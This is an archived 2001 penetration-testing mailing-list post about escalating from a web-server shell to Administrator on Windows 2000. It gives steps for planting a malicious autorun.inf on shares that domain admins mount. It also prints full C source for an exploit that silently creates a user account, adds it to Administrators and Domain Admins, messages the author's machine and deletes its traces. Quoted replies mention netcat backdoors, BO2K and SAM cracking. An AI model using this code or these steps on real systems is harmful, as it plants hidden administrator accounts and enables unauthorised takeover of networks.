Penetration Testing mailing list archives

Re: [PEN-TEST] Expand right under Win2K

From: "Nelson Brito (a.k.a. stderr)" <stderr () SEKURE ORG>
Date: Wed, 10 Jan 2001 13:59:44 -0200

Paul Cardon wrote:

Charlie Rhodes wrote:

We have a win2k where we have access to a cmd.exe with the rights of the
web-server and we would like to obtain administrator rights. Also we
don't have the rights to read the SAM files.
We tried the well-known methdos under win  NT 4.0 (like breaknt.exe,
read from raw device) in vain.


    Do you have network (ftp) access?  or floppy access?
http://www.bo2k.com should do the trick.  You'll probably want to configure
the server part off the machine, then load it on.



This is the second time this question has been asked on the list and
almost everybody misunderstands the problem.  Let me restate it:

Suppose a pen-tester has used the IIS Unicode vulnerability to download
a back door such as a netcat listener to the target Win2K server and now
has a remote cmd shell.  At this point the remote shell is running with
IUSR_<MACHINE> privilege since that is the privilege level that the
Unicode vulnerability provides.

Now, how does the pen-tester elevate privilege to Administrator?

Any software that is downloaded (tftp, ftp, whatever) through the remote
command shell will only run with IUSR_<MACHINE> privilege.  Why do
people think that downloading BO2K, netcat, or some such will magically
elevate privilege?  It doesn't.

The only things that are possible are:

1)  There is a known privilege escalation vulnerability that can be
exploited with local unprivileged access.  The attacker can download and
run that code to gain Administrator access.

You can use another Win2k || NT Machine to execute programs, like:
1 - Copy a "hacked version" of autorun.inf + hacked program to another
Win2K || NT MAchine;
2 - Put the root directory that host autorun.inf in shared mode;
3 - In the IIS Unicode Transversal Machine, mount the shared directory;
4 - Now, you'll see the "hacked autorun.inf" executing arbritary commands.

I think this will hope you...

Another way to do this is:
1 - Find the PDC(if exist) in domain;
2 - Find the "mountable directory" for "Domain Admins";
3 - Put the "hacked autorun.inf" in this directory;
4 - Sit and relax while waiting a member of "Domain Admins" log.

You could do this with a "Shell Folder" vulnerability, and others...


2)  Brute force attack against accounts with local Administrator
privilege.


You can crack the SAM File, coz the IUSR_<MACH> have permission to read
this file.


3)  Look for vulnerabilities in other systems that the web server can
talk to.  Some of those may expose Domain accounts with Administrator
privilege on the web server or other systems that are trusted by the web
server.

There are others but Win2K does limit some of the nicer possibilities
that existed with NT.

-paul


A source example to "hacked autorun.inf" and program looks like:
--- autorun.cpp
/****************************************************************************************
 * Autor        :       Nelson Brito                                                          *
 * E-mail       :       nelson () secunet com br && stderr () sekure org                            *
 * URL  :       http://stderr.sekure.org && http://www.secunet.de                     *
 * Data :       Belem, 09 de Dezembro de 2000.                                        *
 * Publicado:   Rio de Janeiro, 09 de Janeiro de 2001.                                *

****************************************************************************************/

/****************************************************************************************
 * Para explorar esta vulnerabilidade voce tera' que usar o seu
cerebro, pois eu nao    *
 * irei lhe ensinar a como utiliza-lo, estou apenas divulgando o
codigo.                *
 *
                 *
 * Agradecimentos: Bruno Alvim(remorse), Andrea Goulart, Helge Fischer,
Thiago(c0nd0r), *
 *                 Felipe(falcon), corb@sekure(what's up?), Nilson
Brito(brother),      *
 *                 Andre Silveira(phD), Charlene(mi amore) e Mamae...
=)                *

****************************************************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <process.h>      /* A funcao execl() no VC++. */

FILE *fp;

int main(void){

        char *windir = (char *)getenv("WINDIR");      // Onde esta o %SystemRoot%?
        char *batch = "C:\\TEMP\\nelson.bat"; // Batch File temporario.

        /**********************************************************************************
         * Sim, eu sei, eu poderia ter utilizado "NetUserAdd()" e
"NetGroupAdd()", mas    *
         * achei melhor utilizar um arquivo "batch" temporario, fica menor o
codigo.      *
        
**********************************************************************************/
        if(!(fp = fopen(batch, "w"))){ perror("fopen"); exit(0); }

        fprintf(fp, "@echo off\n");
        fprintf(fp, "@%s\\system32\\net.exe user nelson secunet
/fullname:\"Nelson Brito from Security Networks AG / IBQN\"
/comment:\"Penetration Test Account\" /add > nul\n", windir);

        /**********************************************************************************
         * Aqui voce devera' definir se sera' utilizado em um DC ou Stand Alone.
         *
        
**********************************************************************************/
        #ifdef _IS_A_PDC_
                fprintf(fp, "@%s\\system32\\net.exe group Administrators nelson /add >
nul\n", windir);
                fprintf(fp, "@%s\\system32\\net.exe group \"Domain Admins\" nelson /add >
nul\n", windir);
        #else
                fprintf(fp, "@%s\\system32\\net.exe localgroup Administrators nelson /add
> nul\n", windir);
        #endif

        /**********************************************************************************
         * Ao final de tudo, sera' enviada uma mensagem para a maquina PITBULL, a
minha   *
         * maquina. =)
         *
        
**********************************************************************************/
        fprintf(fp, "@%s\\system32\\net.exe send PITBULL \"Autorun Privilege
Escalation Exploit Executed\"\n", windir);
        fprintf(fp, "@%s\\system32\\cmd.exe /c del %s\n", windir, batch);
        fclose(fp);

        execl(batch, batch, NULL);      // Executando o batch file temporario.
        perror("execl");                      // Erro de execucao.

        return(0);
}

--- autorun.cpp

--- autorun.inf
[autorun]
open=autorun.exe
--- autorun.inf

PS: It's work with PGPDisk, at the mount time. When you mount the
PGPDisk, the SYSTEM recognize as a mount point, then it executes the
"hacked autorun.inf".

Sem mais,
--
Nelson Brito
Security Analyst && Penetration Tester
Security Networks AG / IBQN - http://www.secunet.de/

Current thread:

[PEN-TEST] Expand right under Win2K Foldi Tamas (Jan 09)
- Re: [PEN-TEST] Expand right under Win2K Charlie Rhodes (Jan 09)
  - Re: [PEN-TEST] Expand right under Win2K Paul Cardon (Jan 09)
    - Re: [PEN-TEST] Expand right under Win2K Julian Linton (Jan 09)
    - Re: [PEN-TEST] Expand right under Win2K Nelson Brito (a.k.a. stderr) (Jan 10)
    - Re: [PEN-TEST] Expand right under Win2K Paul Cardon (Jan 10)
    - Re: [PEN-TEST] Expand right under Win2K Tamas Foldi (Jan 10)
    - Re: [PEN-TEST] Expand right under Win2K Julian Linton (Jan 11)
    - Re: [PEN-TEST] Expand right under Win2K Nelson Brito (a.k.a. stderr) (Jan 11)
    - Re: [PEN-TEST] Expand right under Win2K Nelson Brito (a.k.a. stderr) (Jan 11)
    - Re: [PEN-TEST] Expand right under Win2K Pascal C. Kocher (Jan 10)
- <Possible follow-ups>
- Re: [PEN-TEST] Expand right under Win2K Edwards, David (JTD) (Jan 09)
- Re: [PEN-TEST] Expand right under Win2K Complx1 * (Jan 09)
- Re: [PEN-TEST] Expand right under Win2K Edwards, David (JTD) (Jan 10)
- Re: [PEN-TEST] Expand right under Win2K Complx1 * (Jan 11)

(Thread continues...)